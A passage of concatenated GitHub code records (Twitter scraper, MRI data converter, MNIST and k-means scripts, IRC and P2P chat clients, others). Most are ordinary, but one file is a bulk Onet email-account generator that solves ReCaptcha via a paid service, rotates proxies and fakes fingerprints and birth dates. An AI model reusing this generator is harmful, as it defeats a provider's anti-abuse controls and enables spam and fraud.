{}'.format(b64_encoded_key),\n 'Content-Type': 
'application/x-www-form-urlencoded;charset=UTF-8'}\nauth_data = {'grant_type': 'client_credentials'}\nauth_resp = requests.post(auth_url, headers=auth_headers, data=auth_data)\n\n# Check status code is 200, meaning \"okay\"\nif auth_resp.status_code != 200:\n    log.error(\"Authorization status code: {}\".format(auth_resp.status_code))\nelse:\n    log.info(\"Authorization request successful\")\n\n# Store access token\naccess_token = auth_resp.json()['access_token']\n\n\"\"\" STEP 1 \"\"\"\ndef build_APIrequest(count = 0, cursor = -1):\n    \"\"\"\n    Builds API request url and retrieves response json, which is saved to file.\n    ----\n    count (int, current result page number)\n    cursor (int)\n    \"\"\"\n    base_url = \"https://api.twitter.com/1.1/friends/ids.json\"\n    search_headers = {'Authorization': 'Bearer {}'.format(access_token)}\n    params = {\"screen_name\": \"PizzaToThePolls\",\n              \"count\": 5000, \n              \"cursor\": cursor}\n    try:\n        response = requests.get(base_url, params = params, headers = search_headers)\n        response.raise_for_status()\n    except HTTPError as http_err:\n        log.error(f'HTTP error occurred: {http_err}') # Python 3.6\n    except Exception as err:\n        log.error(f'Other error occurred: {err}') # Python 3.6\n    else:\n        log.info('Success!')\n    \n    \n    # Save to file\n    friends = response.json()\n    with open(os.path.join(args.outdir, \"friends\" + str(count) + \".json\"), \"w\") as j:\n        json.dump(friends, j)\n    \n    # If next cursor exists, return next cursor\n    if friends['next_cursor'] != 0:\n        log.info(\"There's next page!\")\n        next_ = friends['next_cursor']\n        return next_\n    else:\n        log.info(\"Reached last page!\")\n        return 0 \n\n\"\"\" STEP 2\"\"\"\ndef lookup_friend(friends_, count):\n    \"\"\"\n    Looks up the friends whose user ids are given by `friends_` and\n    retrieves the user objects, which are saved as a json file.\n    ------\n    friends_ (list of user ids to look up)\n    count (int, chunk index used in the output filename)\n    \"\"\"\n    \n    \n    # convert friends_ to a comma-separated character string \n    friends = ','.join([str(f) for f in friends_])\n    \n    \n    base_url = \"https://api.twitter.com/1.1/users/lookup.json\"\n    search_headers = {'Authorization': 'Bearer {}'.format(access_token)}\n    params = {\"user_id\": friends}\n    \n    try:\n        response = requests.get(base_url, params = params, headers = search_headers)\n        response.raise_for_status()\n    except HTTPError as http_err:\n        log.error(f'HTTP error occurred: {http_err}') # Python 3.6\n    except Exception as err:\n        log.error(f'Other error occurred: {err}') # Python 3.6\n    else:\n        log.info('Success!')\n    \n    # Save user object to file\n    users_ = response.json()\n    filename = os.path.join(args.outdir, \"friends_lookup_\" + str(count) + \".json\")\n    with open(filename, \"w\") as j:\n        json.dump(users_, j)\n    log.info(\"Saved response to {}\".format(filename))\n    \n    \n    \n\n    \n    \nif __name__ == \"__main__\":\n    \n    c = 0\n    next_ = build_APIrequest(count = c)\n    while next_ != 0:\n        c += 1\n        next_ = build_APIrequest(count = c, cursor = next_)\n    \n    def chunks(lst, n):\n        \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n        for i in range(0, len(lst), n):\n            yield lst[i:i + n]\n    \n    with open(os.path.join(args.outdir, \"friends0.json\"), \"r\") as j:\n        friends_list = list(chunks(json.load(j)[\"ids\"], 100))\n    for i, f in enumerate(friends_list):\n        lookup_friend(f, i)\n    \n    sys.exit()","repo_name":"amikami102/pizza_to_the_polls","sub_path":"script/friends_of_PTTP/get_friends.py","file_name":"get_friends.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"8570421985","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 29 14:38:26 2019\n\n@author: mzaiss\n\nexperiment desciption:\n\n2D imaging: GRE with spoilers and random phase cycling\n# target is fully relaxed GRE (FA5), task is FLASH with TR>=12ms\n\"\"\"\n\nimport os, sys\nimport numpy as np\nimport pickle\nimport scipy\nimport scipy.io\n\n\npath = '../out'\nexperiment_id = 'FLASH_spoiled_lowSAR_test_sunday'\n\n#path = 'K:\\CEST_seq\\pulseq_zero\\sequences'\n#experiment_id = 'FLASH_spoiled_lowSAR64_400spins_multistep'\n\n\n\nwith open(os.path.join(path,experiment_id,'param_reco_history.pdb'), 'rb') as handle:\n b = pickle.load(handle)\n\nNIter = len(b[0])\nsz = np.int(np.sqrt(b[0][0]['reco_image'].shape[0]))\n\nNRep = sz\nT = sz + 4\n\nif sz == 64:\n event_time = 0.2*1e-3*np.ones((T,NRep))\n event_time[1,:] = 3*1e-3\n event_time[-2,:] = 3*1e-3 \nelse:\n event_time = 0.2*1e-3*np.ones((T,NRep))\n event_time[1,:] = 1e-3\n event_time[-2,:] = 1e-3\n\nall_flips = np.zeros((NIter,T,NRep,2))\nall_event_times = np.zeros((NIter,T,NRep))\nall_grad_moms = np.zeros((NIter,T,NRep,2))\nall_reco_images = np.zeros((NIter,sz,sz,2))\n\nfor ni in range(NIter):\n all_flips[ni] = b[0][ni]['flips_angles']\n all_event_times[ni] = event_time\n all_grad_moms[ni] = b[0][ni]['grad_moms']\n all_reco_images[ni] = b[0][ni]['reco_image'].reshape([sz,sz,2])\n \n\nscanner_dict = dict()\nscanner_dict['flips'] = all_flips\nscanner_dict['event_times'] = all_event_times\nscanner_dict['grad_moms'] = all_grad_moms\nscanner_dict['reco_images'] = all_reco_images\nscanner_dict['sz'] = np.array([sz,sz])\nscanner_dict['T'] = T\nscanner_dict['NRep'] = NRep\n\npath=os.path.join('../out/',experiment_id)\ntry:\n os.mkdir(path)\nexcept:\n print('export_to_matlab: directory already exists')\n \nscipy.io.savemat(os.path.join(path,\"all_iter.mat\"), scanner_dict)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"skye789/MRI-Sequence-Programming","sub_path":"MRTwin_pulseq-exercise/code/MRtwin/auxutil/au02_seq_history_matlab_convert.py","file_name":"au02_seq_history_matlab_convert.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25219843515","text":"from PIL import Image\nimport torchvision\nimport torch\nimport torch.nn.functional as F\n\ntorch.set_printoptions(precision=0, linewidth=160)\n\n# Approach 2: Cheat\n# Copying the methodology from the fast.ai book:\n# Averaging over the training dataset to get the Platonic digits, instead of hand-defining them\n\n\n# get dataset\nmnist = torchvision.datasets.MNIST(\"data\", download=True)\n\n\ndef to_img(t):\n \"\"\"Converts a pytorch tensor into an image\"\"\"\n return torchvision.transforms.ToPILImage()(t)\n\n\n# get tensors from dataset for a particular digit #\ndef get_n_tensors(n):\n return [mnist.data[i] for i in range(len(mnist.data)) if mnist.targets[i] == torch.tensor(n)]\n\n\ndef make_average(t): return (torch.stack(t).float() / 255).mean(0)\n\n\nplatonic_digits = [make_average(get_n_tensors(n)) for n in range(10)]\n\n# How to show an img:\n# to_img(t).show()\n\n# stacked_twos = make_average(get_n_tensors(2))\n# to_img(stacked_twos).show()\n\ndef predict(img_tensor):\n \"\"\"Predicts which digit the image represents\"\"\"\n scores = [F.l1_loss(digit, img_tensor) for digit in platonic_digits]\n\n lowest = 0\n lowest_score = float(\"inf\")\n for i, s in enumerate(scores):\n if s < lowest_score:\n lowest = i\n lowest_score = s\n return lowest\n\n\ndef 
get_results():\n    correct = 0\n    dataset_length = len(mnist.data)\n    for i in range(dataset_length):\n        img = mnist.data[i]\n        result = mnist.targets[i]\n\n        prediction = predict(img)\n\n        if prediction == result:\n            correct += 1\n\n    return correct / dataset_length\n\n\nprint(get_results())\n","repo_name":"mulholo/mnist","sub_path":"02_identify_cheat.py","file_name":"02_identify_cheat.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23441546385","text":"#!/usr/bin/env python\nimport numpy as np\nimport scipy\nimport scipy.linalg as la\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n#from mnist import MNIST\nimport pickle\nimport os\nsns.set()\nsns.set_style(\"ticks\")\nnp.random.seed(1)\nprint(\"modules loaded\")\n\n\n\ndef load_data():\n\tsavedf = \"data.pkl\"\n\tif(os.path.exists(savedf)):\n\t\tprint(\"Reading: \" + savedf)\n\t\twith open(savedf, 'rb') as input:\n\t\t\tX_train = pickle.load(input)\n\t\t\tlabels_train = pickle.load(input)\n\t\t\tX_test = pickle.load(input)\n\t\t\tlabels_test = pickle.load(input)\n\telse:\n\t\tmndata = MNIST('python-mnist/data/')\n\t\tX_train, labels_train = map(np.array, mndata.load_training())\n\t\tX_test, labels_test = map(np.array, mndata.load_testing())\n\t\tX_train = X_train/255.0\n\t\tX_test = X_test/255.0\n\t\twith open(savedf, 'wb') as output:\n\t\t\tpickle.dump(X_train, output, pickle.HIGHEST_PROTOCOL)\n\t\t\tpickle.dump(labels_train, output, pickle.HIGHEST_PROTOCOL)\n\t\t\tpickle.dump(X_test, output, pickle.HIGHEST_PROTOCOL)\n\t\t\tpickle.dump(labels_test, output, pickle.HIGHEST_PROTOCOL)\n\t\n\tX = np.concatenate((X_test, X_train))\n\ty = np.concatenate((labels_test, labels_train))\n\tprint(X.shape, y.shape)\n\treturn(X, y)\n\n\ndef objfun(alldists, clusters, k):\n\tobj = 0\n\tfor i in range(k):\n\t\tidxs = (clusters == i)\n\t\tcut = alldists[idxs,i]\n\t\tobj += np.sum(np.square(cut))\n\treturn(obj)\n\ndef dists(X, cent):\n\tdist = np.linalg.norm(X-cent, axis=1, ord=2)\n\treturn(dist)\n\ndef distMat(X, cents):\n\tn = X.shape[0]\n\tk = cents.shape[0]\n\talldists = np.zeros((n,k))\n\tfor i in range(k):\n\t\t#print(i, k)\n\t\talldists[:, i] = dists(X, cents[i, :])\t\n\treturn(alldists)\n\ndef DxProb(alldists):\n\trtn = np.square( np.min(alldists, axis=1) )\n\trtn2 = rtn / np.sum(rtn)\n\tprint(rtn2.shape)\n\treturn(rtn2)\n\ndef findCluster(X, cents):\n\tk = cents.shape[0]\n\talldists = distMat(X, cents)\n\tclusters = np.argmin(alldists, axis=1)\n\treturn(clusters, alldists)\n\ndef getCents(X, clusters, k):\n\tcents = np.zeros((k, X.shape[1]))\n\tfor i in range(k):\n\t\t#print(clusters, i)\n\t\tidxs = (clusters == i)\n\t\t#print(\"idxs\", idxs)\n\t\tcut = X[idxs,:]\n\t\t#print(cut)\n\t\tcents[i,:] = np.mean(cut, axis=0)\t\n\treturn(cents)\n\ndef isDone(old, new):\n\tn = old.shape[0]\n\tsame = np.sum(old==new)\n\treturn(same == n)\n\ndef kppStart(X, k):\n\tn = X.shape[0]\n\ttmp = np.arange(n)\n\tselidx = np.random.choice(tmp, size=1, replace=False)\n\tcents = X[selidx, :]\n\t# add additional centers\n\tfor i in range(k-1):\n\t\talldists = distMat(X, cents)\n\t\tprobs = DxProb(alldists)\n\t\tj = 0 \n\t\twhile(True):\n\t\t\trandint = np.random.randint(0, n)\n\t\t\tthresh = np.random.uniform()\n\t\t\tval = probs[randint]\n\t\t\tif( val > thresh ):\n\t\t\t\tnewcent = X[randint, :].reshape(1,X.shape[1])\n\t\t\t\t#print(val, thresh, j, 
newcent.shape)\n\t\t\t\tcents = np.concatenate((cents, newcent))\n\t\t\t\tbreak\t\t\t\n\t\t\tj += 1\n\tprint(cents.shape)\n\treturn(cents)\n\ndef selStart(X, k):\n\tn = X.shape[0]\n\ttmp = np.arange(n)\n\tselidx = np.random.choice(tmp, size=k, replace=False)\n\t#print(selidx)\n\treturn(X[selidx,:])\n\ndef myplot(cents, name, objs):\n\tk = cents.shape[0]\n\t\n\t#objective function\n\tfig = plt.figure()\n\tsns.lineplot(np.arange(len(objs)), objs, markers=True, style=1)\t\n\tplt.xlabel(\"Iteration\")\n\tplt.ylabel(\"Objective\")\n\tout = name + \".obj.\" + str(k) + \".pdf\"\n\tfig.suptitle(out)\n\tplt.savefig(out)\n\n\t# visualization\n\tt = int(np.ceil(k/5))\n\tfig, axs = plt.subplots(ncols = 5, nrows = t, figsize=(5*2, t*2))\n\n\tfor i in range(k):\n\t\tax = axs.flat[i]\n\t\tax.set_aspect(\"equal\")\n\t\tax.get_xaxis().set_visible(False)\n\t\tax.get_yaxis().set_visible(False)\n\t\tdata = cents[i, :].reshape((28,28))\n\t\tsns.heatmap(data, ax = ax, cbar=False)\n\tout = name + \".heat.\" + str(k) + \".pdf\"\n\n\tsns.despine(fig, left=True, bottom=True)\n\tfig.suptitle(out)\n\tplt.savefig(out)\n\t\ndef runlloyd(X, cents, name = \"random\"):\n\tk = cents.shape[0]\n\tobjs = []\n\tclusters, alldists = findCluster(X, cents)\n\tobj = objfun(alldists, clusters, k)\n\tobjs.append(obj)\n\n\twhile(True):\n\t\tcents = getCents(X, clusters, k)\n\t\tnewclusters, alldists = findCluster(X, cents)\n\t\tnewobj = objfun(alldists, newclusters, k)\n\t\tobjs.append(newobj)\n\t\tprint(newobj, newobj < obj)\n\t\tif(newobj >= obj):\n\t\t\tbreak\n\t\telse:\n\t\t\tobj = newobj\n\t\t\tclusters = newclusters\n\tmyplot(cents, name, objs)\n\treturn(clusters, cents)\n\t\n#\n# load / save\n#\nX, y = load_data()\n#X = X[np.random.randint(1, X.shape[0], size=1000), :]\n\nfor k in [5, 10, 20]:\n\tprint(\"rand\")\n\tcents = selStart(X, k=k)\n\tprint(cents.shape)\n\trunlloyd(X, cents)\n\tprint(\"kpp\")\n\tcents = kppStart(X, k=k)\n\trunlloyd(X, cents, name=\"kpp\")\n\n\n","repo_name":"mrvollger/CSE546","sub_path":"hw3/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28007116430","text":"'''Author: Eric Adjei Appiah\nCS 151 Section: B\nFall 2022\nDate: 10th November, 2022\n'''\n\nfrom lab07 import *\nimport turtle as trt\n\ndef main():\n    '''Reads the alice text file and converts it into a drawn braille'''\n    file = open('alice.txt','r')\n    lines = file.readlines()\n    for line in lines:\n        line = line.strip()\n        bs=translator(line,braille_dictionary)\n        draw_word(trt, bs)\n    file.close()\nmain()\n","repo_name":"heyerichere/Braille","sub_path":"extension2.py","file_name":"extension2.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8746280742","text":"import socket\nimport time\nimport re\n\nclass Client:\n    \"\"\"Class IRC client\"\"\"\n    def __init__(self, addr=str, port=int, nickname=\"Guest\", fullname=\"John Doe\", password=\"\"):\n        \"\"\"Constructor. 
Setup the socket.\"\"\"\n self.addr = addr\n self.port = port\n self.nickname = nickname\n self.fullname = fullname\n self.password = password\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.connected = False\n self.logged = False\n\n def ask_config(self):\n \"\"\"Ask the mandatory options to the user\"\"\"\n\n next_step = False\n while next_step is False:\n self.addr = input(\"Ip address: \")\n if self.addr == \"\":\n print(\"Please write something.\")\n else:\n next_step = True\n\n next_step = False\n while next_step is False:\n tmp = input(\"Port (6667): \")\n if tmp == \"\":\n next_step = True\n elif type(tmp) is int or (type(tmp) is str and tmp.isdigit() is True):\n self.port = int(tmp)\n next_step = True\n else:\n print(\"Please enter a valid port.\")\n\n next_step = False\n while next_step is False:\n tmp = input(\"Nickname (\\\"Guest\\\"): \")\n if tmp == \"\":\n next_step = True\n elif len(tmp) <= 31:\n next_step = True\n self.nickname = tmp\n else:\n print(\"Invalid nickname (over 31 characters).\")\n \n next_step = False\n while next_step is False:\n tmp = input(\"Real Name (\\\"John Doe\\\"): \")\n if tmp == \"\":\n next_step = True\n elif len(tmp) <= 31:\n next_step = True\n self.nickname = tmp\n \n self.password = input(\"Password (press enter if empty): \")\n\n\n def connect(self):\n \"\"\"Connect the user into the IRC server\"\"\"\n if self.addr is None or self.addr == \"\":\n print(\"No ip address given.\")\n return\n self.socket.connect((self.addr, self.port))\n self.connected = True\n self.socket.setblocking(True)\n print(\"Connected to \" + self.addr + \":{}\".format(self.port))\n\n def login(self):\n self.send_command(\"NICK \" + self.nickname)\n self.send_command(\"USER \" + self.nickname + \" \" + self.nickname + \" \" + self.nickname + \" :\" + self.fullname)\n if self.password != \"\":\n self.send_command(\"PASS \" + self.password)\n self.logged = True\n\n def get_response(self):\n return self.socket.recv(8192)\n\n def disconnect(self):\n \"\"\"Disconnect the user from the IRC server\"\"\"\n print(\"Disconnecting from the server...\")\n self.send_command(\"QUIT :Bye\")\n self.connected = False\n\n def send_to(self, user, text):\n self.send_command(\"PRIVMSG \" + user + \":\" + text)\n\n def join(self, channel):\n self.send_command(\"JOIN \" + channel)\n\n def send_command(self, cmd=str):\n \"\"\"Send a command to the IRC server and wait for the response\"\"\"\n self.socket.send((cmd + \"\\r\\n\").encode())\n\n def ping_handler(self):\n data = self.get_response()\n if data.find(b\"PING\") != -1:\n pong = data.decode().split(':')[1]\n self.socket.send(pong.encode())\n return \"PING\"\n else:\n return data.decode()\n\n def is_disconnected(self, data=bytes):\n clearedData = data.decode().split(\"\\n\")\n clearedData = clearedData[len(clearedData) - 2]\n if clearedData.startswith('ERROR :Closing link:') is True:\n self.connected = False\n return True\n else:\n return False\n \n def message_handling(self, msg):\n msg_array = msg.split(\"\\r\\n\")\n for line in msg_array:\n print(line)\n if re.search(r\" [4-5][0-9]{2} \\* \" + self.nickname, line):\n return False\n return True\n\n def __del__(self):\n if self.socket is not None:\n self.socket.close()","repo_name":"nathantouze/IRC_client-CLI-","sub_path":"irc.py","file_name":"irc.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73804428324","text":"import collections\nimport heapq\n\n\ndef 
reorganizeString(s):\n    if not s:\n        return ''\n    heap, last, ans = [], None, ''\n    counts = collections.Counter(s)\n    for ch in counts:\n        heapq.heappush(heap, (-counts[ch], ch))\n\n    while heap:\n        count, ch = heapq.heappop(heap)\n        ans += ch\n        if last:\n            heapq.heappush(heap, last)\n        last = (count + 1, ch) if count != -1 else None\n\n    return ans if not last else ''\n\ns = 'aaabab'\nprint(reorganizeString(s))","repo_name":"tanjingjing123/LeetcodeAlgorithms","sub_path":"reorganizeString.py","file_name":"reorganizeString.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18374995860","text":"a=int(input(\"Number of test cases T (1<=T<=20): \"))\r\n\r\nfor m in range(a):\r\n    b=[]\r\n    a=0\r\n    for j in range(0,4):\r\n        b.append(int(input()))\r\n    if b[1]-b[0]==b[2]-b[1]==b[3]-b[2]:\r\n        b.append(b[3]+b[3]-b[2])\r\n        for m in range(len(b)):\r\n            print(\"%d\"%(b[m]),end=\" \")\r\n        print(\"\\nThis is an arithmetic sequence\")\r\n    elif b[1]/b[0]==b[2]/b[1]==b[3]/b[2]:\r\n        b.append(b[3]*b[2]/b[1])\r\n        for m in range(len(b)):\r\n            print(\"%d\"%(b[m]),end=\" \")\r\n        print(\"\\nThis is a geometric sequence\")\r\n    else:\r\n        print('This is not a sequence')","repo_name":"yao092/exercise","sub_path":"36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24098178075","text":"import socket\nimport threading\nimport rsa\nfrom Cryptodome.Random import get_random_bytes\n\nclass Chat:\n    def __init__(self,rcv,enc):\n        self.rcv = rcv\n        self.enc = enc\n        self.my_sock= None\n        self.set_status = None\n        self.set_peer_ip = None\n        self.set_port = None\n        self.target_ip =None\n\n    def start_chat_await(self):\n        listen_ip = '0.0.0.0'\n        listen_port = 888 # int(input('Enter listening port: '))\n        self.set_port(str(listen_port))\n\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.bind((listen_ip, listen_port))\n        self.my_sock = sock\n        await_thread = threading.Thread(target=self.await_connection)\n        await_thread.start()\n\n    def await_connection(self):\n        self.my_sock.listen(1)\n        print('Waiting for incoming connection...')\n        self.set_status(\"Awaiting\")\n        self.start_chat()\n\n    def start_chat(self):\n        sending_sock, client_addr = self.my_sock.accept()\n        self.rcv.sending_soc = sending_sock\n        print('Connected to peer:', client_addr[0])\n\n        self.set_peer_ip(str(client_addr[0]))\n\n        aes_key = get_random_bytes(16)\n        self.rcv.aes_key = aes_key\n\n        while True:\n            data = sending_sock.recv(1024).decode('utf-8')\n            if data.startswith('KEY'):\n                self.rcv.receive_public_key(data)\n                break\n\n        n, e = str(self.rcv.peer_key).split(\",\")\n        encrypted_key = self.enc.encrypt_message(aes_key, rsa.PublicKey(int(n), int(e)))\n        self.enc.send_aes_key(sending_sock, encrypted_key)\n\n        self.set_status(\"Connected\")\n\n        receive_thread = threading.Thread(target=self.rcv.receive_messages)\n        receive_thread.start()\n\n    def start_chat_connect(self):\n\n        target_port = 888\n        if self.target_ip is None:\n            return\n\n        sending_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        try:\n            sending_sock.connect((self.target_ip, target_port))\n        except:\n            self.set_status(\"Wrong IP\")\n            return\n\n        self.rcv.sending_soc = sending_sock\n        print('Connected to peer')\n\n\n\n        self.enc.send_public_key(sending_sock)\n        while True:\n            data = sending_sock.recv(1024)\n            self.rcv.receive_aes_key(data)\n            break\n\n        self.set_status(\"Connected\")\n        self.set_peer_ip(str(self.target_ip))\n        self.set_port(str(target_port))\n\n        receive_thread = 
threading.Thread(target=self.rcv.receive_messages)\n receive_thread.start()\n\n\n\n","repo_name":"Nemezjusz/Chat-P2P","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13778571340","text":"import csv\nimport json\nimport random\nimport sys\nimport time\n\nimport capsolver\nimport requests\n\nfrom utils.logger import CustomLogger\nfrom utils.save_to_csv import save_success_data\nfrom utils.webhooks import Webhook\n\nlog = CustomLogger(__name__)\n\n\nclass Account:\n proxy = []\n fingerprint = [\"5f365f6da776a4ebdb2c5f8ea8d1a68d\", \"1b7e1b5a9cd9931c61c028b2de59b10f\",\n \"a11a1b233f8a6e9f71c93c7521a329ab\", \"c3b47470daa0c9a7394824ea12cfd5d1\",\n \"899b821f0a8cd6dbb8b43f671df5d781\", \"3d8783156630ccfe0cc7e599e5e0475c\",\n \"bddc398d5d34994d2e8e6b5083ea8da6\", \"19a7e8985c44b8ee2dca970fc8520122\",\n \"e1ca82b3e8efc26f6f846d7082c8d9bc\", \"77b554de4407974ba69e1f6775b416b7\",\n \"fac8cb2ad4ce55760dc41a9301f47f7b\", \"0418201bb96e8b6efc2446ba6dd5fe6b\"]\n\n def __init__(self, data):\n self.data = data\n self.session = requests.Session()\n self.mail = f\"{self.data['login']}@{self.data['domain']}\"\n\n @classmethod\n def proxy_format(cls):\n try:\n with open(\"proxies.txt\", \"r\") as file:\n proxy_lines = (line.strip().split(\":\") for line in file)\n cls.proxy.extend([f\"http://{octet[2]}:{octet[3]}@{octet[0]}:{octet[1]}\" for octet in proxy_lines])\n\n if not cls.proxy:\n raise ValueError(\"Fill proxies.txt file\")\n\n except ValueError as e:\n log.error(e)\n sys.exit()\n except Exception as e:\n log.error(e)\n sys.exit()\n\n @classmethod\n def get_capsvoler_key(cls):\n try:\n with open(\"key.json\", \"r\") as file:\n data = json.load(file)\n\n if not data['key']:\n log.error(\"Add capsolver key in key.json\")\n sys.exit()\n capsolver.api_key = data['key']\n except Exception as e:\n log.error(e)\n sys.exit()\n\n @staticmethod\n def generate_date():\n return f\"{random.choice(range(1990, 2003))}-{str(random.choice(range(1, 13))).zfill(2)}-{str(random.choice(range(1, 30))).zfill(2)}\"\n\n def first_payload(self):\n try:\n log.debug(f\"[{self.mail}]Solving ReCaptcha...\")\n\n self.solution = capsolver.solve({\n \"type\": \"ReCaptchaV3Task\",\n \"pageAction\": \"checkRegisterEmailIdentity\",\n \"websiteKey\": \"6LcdGIQlAAAAAHWCwQXSx1-Voi9npxOU9zNiwGdz\",\n \"websiteURL\": \"https://konto.onet.pl/register?state=https%3A%2F%2Fpoczta.onet.pl%2F&client_id=poczta.onet.pl.front.onetapi.pl\",\n \"proxy\": random.choice(Account.proxy)\n })\n\n log.debug(f\"[{self.mail}]Submitting payload...\")\n\n req = self.session.post(\n \"https://konto.onet.pl/newapi/oauth/check-register-email-identity\",\n headers={\n \"content-type\": \"application/json\",\n \"referer\": \"https://konto.onet.pl/\",\n \"user-agent\": self.solution['userAgent']\n },\n data=json.dumps({\n \"state\": \"https://poczta.onet.pl/\",\n \"login\": self.data['login'],\n \"domain\": self.data['domain'],\n \"captcha_response\": self.solution['gRecaptchaResponse'],\n }),\n proxies={\n \"https\": random.choice(Account.proxy)\n },\n timeout=7)\n\n if req.ok:\n try:\n if req.json()['verificationType'] == 'CAPTCHA':\n time.sleep(1)\n self.second_payload()\n elif req.json()['verificationType'] == 'SMS':\n log.critical(f\"[{self.mail}]Account requires phone number verification, retrying in 10 seconds...\")\n time.sleep(10)\n return self.first_payload()\n except Exception as e:\n 
log.error(f\"[{self.mail}]Unknown error [{req.status_code} | {e}]\")\n time.sleep(5)\n return self.first_payload()\n except requests.exceptions.ProxyError:\n log.error(f\"[{self.mail}]Proxy Error, retrying in 5 seconds...\")\n time.sleep(5)\n return self.first_payload()\n except requests.exceptions.Timeout:\n log.error(f\"[{self.mail}]Timeout, retrying in 5 seconds...\")\n time.sleep(5)\n return self.first_payload()\n\n def second_payload(self):\n try:\n log.debug(f\"[{self.mail}]Creating account...\")\n\n req = self.session.post(\n \"https://konto.onet.pl/newapi/oauth/email-user\",\n headers={\n \"content-type\": \"application/json\",\n \"referer\": \"https://konto.onet.pl/\",\n \"user-agent\": self.solution['userAgent']\n },\n data=json.dumps({\n \"login\": self.data['login'],\n \"domain\": self.data['domain'],\n \"password\": self.data['password'],\n \"name\": self.data['firstname'],\n \"surname\": self.data['lastname'],\n \"place\": None,\n \"postal_code\": None,\n \"sex\": \"M\",\n \"date_of_birth\": Account.generate_date(),\n \"agreements\": [\"6\", \"21\", \"85\"],\n \"phone\": \"\",\n \"phone_token\": None,\n \"fingerprint\": random.choice(Account.fingerprint),\n \"browser_params\": self.solution['userAgent'],\n \"guardian_email\": \"\",\n \"save_phone\": True,\n \"client_id\": \"poczta.onet.pl.front.onetapi.pl\",\n \"recoveryEmail\": self.data['recovery mail'],\n \"lang\": \"pl\",\n \"group_order\": \"\",\n \"service_with_inbox\": False\n }))\n\n if req.ok:\n if \"https://konto.onet.pl/checkSSO/auth.html?client_id=poczta.onet.pl.front.onetapi.pl&code=\" in req.json()['redirectUrl']:\n log.info(f\"[{self.mail}]Account created!\")\n save_success_data(self.data)\n Webhook.onet_success(\n self.data['webhook url'],\n f\"{self.mail}:{self.data['password']}\"\n )\n else:\n log.error(f\"[{self.mail}]Something went wrong while creating account... 
[{req.json()}]\")\n                    Webhook.onet_failed(\n                        self.data['webhook url'],\n                        f\"{self.mail}:{self.data['password']}\",\n                        f\"Something went wrong while creating account [{req.json()}]\"\n                    )\n            elif req.status_code == 500:\n                log.error(f\"[{self.mail}]Incorrect data in the csv file/fingerprint\")\n                Webhook.onet_failed(\n                    self.data['webhook url'],\n                    f\"{self.mail}:{self.data['password']}\",\n                    f\"Incorrect data in the csv file/fingerprint\"\n                )\n        except requests.exceptions.ProxyError:\n            log.error(f\"[{self.mail}]Proxy Error, retrying in 5 seconds...\")\n            time.sleep(5)\n            return self.second_payload()\n        except requests.exceptions.Timeout:\n            log.error(f\"[{self.mail}]Timeout, retrying in 5 seconds...\")\n            time.sleep(5)\n            return self.second_payload()\n\n\ndef run():\n    Account.proxy_format()\n    Account.get_capsvoler_key()\n\n    with open('data/onet.csv', 'r', encoding='utf-8') as file:\n        reader = csv.DictReader(file)\n        lines = list(reader)\n\n\n    for i in lines:\n        if all(value for value in i.values()):\n            task = Account(i)\n            task.first_payload()\n            log.warning(\"Waiting 30 seconds...\")\n            time.sleep(30)\n        else:\n            log.error(\"Missing value(s) in csv line, skipping...\")\n            time.sleep(3)\n\n    print(\"\", flush=True)\n\n    log.info(\"ALL TASKS HAVE BEEN EXECUTED\")\n\n\nif __name__ == '__main__':\n    run()\n","repo_name":"Michal22git/onet-email-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21632989444","text":"import logging\n# KiteTicker is instantiated below, so it must be imported as well\nfrom kiteconnect import KiteConnect, KiteTicker\nfrom configparser import ConfigParser \nfrom pprint import pprint\nimport pdb\n\n \nconfigur = ConfigParser() \nconfigur.read('config.ini')\nApi_key= configur.get('credentials','Api_key')\nApi_secret= configur.get('credentials','Api_secret')\nAccess_token= configur.get('credentials','Access_token')\nprint(Api_key)\nprint(Api_secret)\nprint(Access_token)\n\nkws = KiteTicker(Api_key, Access_token)\n\n\ndef on_ticks(ws, ticks):\n    print(ticks)\n    print(\"\\n\")\n    # pdb.set_trace()\n\n\ndef on_connect(ws, response):\n    ws.subscribe([3050241, 177665])\n    ws.set_mode(ws.MODE_FULL, [3050241, 177665])\n\n\nkws.on_ticks = on_ticks\nkws.on_connect = on_connect\nkws.connect()\n","repo_name":"deva567/my_blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8963783289","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[262]:\n\n\nimport pandas as 